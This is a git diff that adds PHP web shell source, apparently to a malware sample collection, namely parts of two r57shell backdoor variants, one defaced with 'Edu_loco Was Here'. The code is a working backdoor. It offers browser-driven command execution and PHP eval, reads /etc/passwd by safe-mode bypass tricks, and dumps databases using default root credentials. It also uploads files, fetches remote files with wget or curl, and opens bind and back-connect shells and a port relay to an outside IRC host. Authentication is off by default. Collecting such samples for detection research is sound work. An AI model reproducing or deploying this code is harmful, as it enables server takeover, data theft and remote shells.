sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +if(!$safe_mode){ +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font; +echo "<div align=center><textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.$table_end1.$fe; +} +if(!$safe_mode&&!$windows){ +echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.$table_end1.$fe; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1')); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>"; +} +if(!$safe_mode&&!$windows){ +echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></table>"; +} +echo $table_up3."<div align=center><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC - Edu_loco | <a href=http://www.sameklink.tk>http://www.sameklink.tk</a> | | version ".$version." ]---o</b></font></div></td></tr></table>".$f; +?><marquee> +<font face="Verdana" size="4"color="#FFFFFF"><b>Edu_loco Was Here =D !</b></font></marquee> + + diff --git a/PHP/Backdoor.PHP.Rst.g b/PHP/Backdoor.PHP.Rst.g new file mode 100644 index 00000000..a3b47dc0 --- /dev/null +++ b/PHP/Backdoor.PHP.Rst.g @@ -0,0 +1,2209 @@ +<?php + +//Created using ArabianAttacker Website's Hacking Tool Kit +//WwW.TM-WORLD.NeT +//WwW.TM-WORLD.NeT/ArabianAttackerr57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü ñèñòåìíûå êîìàíäû íà ñåðâåðå ÷åðåç áðàóçåð +/* Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru +/* Âåðñèÿ: 1.3 (05.03.2006) +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* Îòäåëüíàÿ áëàãîäàðíîñòü çà ïîìîùü è èäåè: blf, phoenix, virus, NorD è âñåì ÷åðòÿì èç RST/GHC. +/* Åñëè ó Âàñ åñòü êàêèå-ëèáî èäåè ïî ïîâîäó òîãî êàêèå ôóíêöèè ñëåäóåò äîáàâèòü â ñêðèïò òî ïèøèòå +/* íà rst@void.ru. Âñå ïðåäëîæåíèÿ áóäóò ðàññìîòðåíû. +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* (c)oded by 1dt.w0lf +/* RST/GHC http://rst.void.ru , http://ghc.ru +/* ANY MODIFIED REPUBLISHING IS RESTRICTED +/******************************************************************************************************/ +/* ~~~ Íàñòðîéêè | Options ~~~ */ + +// Âûáîð ÿçûêà | Language +// $language='ru' - ðóññêèé (russian) +// $language='eng' - english (àíãëèéñêèé) +$language='ru'; + +// Àóòåíòèôèêàöèÿ | Authentification +// $auth = 1; - Àóòåíòèôèêàöèÿ âêëþ÷åíà ( authentification = On ) +// $auth = 0; - Àóòåíòèôèêàöèÿ âûêëþ÷åíà ( authentification = Off ) +$auth = 0; + +// Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó (Login & Password for access) +// ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅÐÂÅÐÅ!!! (CHANGE THIS!!!) +// Ëîãèí è ïàðîëü øèôðóþòñÿ ñ ïîìîùüþ àëãîðèòìà md5, çíà÷åíèÿ ïî óìîë÷àíèþ 'r57' +// Login & password crypted with md5, default is 'r57' +$name='ec371748dc2da624b35a4f8f685dd122'; // ëîãèí ïîëüçîâàòåëÿ (user login) +$pass='ec371748dc2da624b35a4f8f685dd122'; // ïàðîëü ïîëüçîâàòåëÿ (user password) +/******************************************************************************************************/ +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = "1.3"; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="r57shell"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>"); + } +} +$head = '<!-- Çäðàâñòâóé Âàñÿ --> +<html> +<head> +<title>r57shell</title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> + +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +td { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +.table1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +BACKGROUND-COLOR: #D4D0C8; +} +.td1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +font: 7pt Verdana; +} +.tr1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +} +table { +BORDER-RIGHT: #eeeeee 1px outset; +BORDER-TOP: #eeeeee 1px outset; +BORDER-LEFT: #eeeeee 1px outset; +BORDER-BOTTOM: #eeeeee 1px outset; +BACKGROUND-COLOR: #D4D0C8; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR: #e4e0d8; +width: 30%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: Fixedsys bold; +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE>'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . + "\x00\x00"; + } +} +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(@mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +class my_sql + { + var $host = 'localhost'; + var $port = ''; + var $user = ''; + var $pass = ''; + var $base = ''; + var $db = ''; + var $connection; + var $res; + var $error; + var $rows; + var $columns; + var $num_rows; + var $num_fields; + var $dump; + + function connect() + { + switch($this->db) + { + case 'MySQL': + if(empty($this->port)) { $this->port = '3306'; } + if(!function_exists('mysql_connect')) return 0; + $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'MSSQL': + if(empty($this->port)) { $this->port = '1433'; } + if(!function_exists('mssql_connect')) return 0; + $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); + if($this->connection) return 1; + break; + case 'PostgreSQL': + if(empty($this->port)) { $this->port = '5432'; } + $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; + if(!function_exists('pg_connect')) return 0; + $this->connection = @pg_connect($str); + if(is_resource($this->connection)) return 1; + break; + case 'Oracle': + if(!function_exists('ocilogon')) return 0; + $this->connection = @ocilogon($this->user, $this->pass, $this->base); + if(is_resource($this->connection)) return 1; + break; + } + return 0; + } + + function select_db() + { + switch($this->db) + { + case 'MySQL': + if(@mysql_select_db($this->base,$this->connection)) return 1; + break; + case 'MSSQL': + if(@mssql_select_db($this->base,$this->connection)) return 1; + break; + case 'PostgreSQL': + return 1; + break; + case 'Oracle': + return 1; + break; + } + return 0; + } + + function query($query) + { + $this->res=$this->error=''; + switch($this->db) + { + case 'MySQL': + if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) + { + $this->error = @mysql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'MSSQL': + if(false===($this->res=@mssql_query($query,$this->connection))) + { + $this->error = 'Query error'; + return 0; + } + else if(@mssql_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'PostgreSQL': + if(false===($this->res=@pg_query($this->connection,$query))) + { + $this->error = @pg_last_error($this->connection); + return 0; + } + else if(@pg_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'Oracle': + if(false===($this->res=@ociparse($this->connection,$query))) + { + $this->error = 'Query parse error'; + } + else + { + if(@ociexecute($this->res)) + { + if(@ocirowcount($this->res) != 0) return 2; + return 1; + } + $error = @ocierror(); + $this->error=$error['message']; + } + break; + } + return 0; + } + function get_result() + { + $this->rows=array(); + $this->columns=array(); + $this->num_rows=$this->num_fields=0; + switch($this->db) + { + case 'MySQL': + $this->num_rows=@mysql_num_rows($this->res); + $this->num_fields=@mysql_num_fields($this->res); + while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); + @mysql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MSSQL': + $this->num_rows=@mssql_num_rows($this->res); + $this->num_fields=@mssql_num_fields($this->res); + while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); + @mssql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; + break; + case 'PostgreSQL': + $this->num_rows=@pg_num_rows($this->res); + $this->num_fields=@pg_num_fields($this->res); + while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); + @pg_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'Oracle': + $this->num_fields=@ocinumcols($this->res); + while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; + @ocifreestatement($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + } + return 0; + } + function dump($table) + { + if(empty($table)) return 0; + $this->dump=array(); + $this->dump[0] = '##'; + $this->dump[1] = '## --------------------------------------- '; + $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); + $this->dump[3] = '## Database: '.$this->base; + $this->dump[4] = '## Table: '.$table; + $this->dump[5] = '## --------------------------------------- '; + switch($this->db) + { + case 'MySQL': + $this->dump[0] = '## MySQL dump'; + if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + $this->dump[] = $this->rows[0]['Create Table']; + $this->dump[] = '## --------------------------------------- '; + if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} + $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MSSQL': + $this->dump[0] = '## MSSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'PostgreSQL': + $this->dump[0] = '## PostgreSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'Oracle': + $this->dump[0] = '## ORACLE dump'; + $this->dump[] = '## under construction'; + break; + default: + return 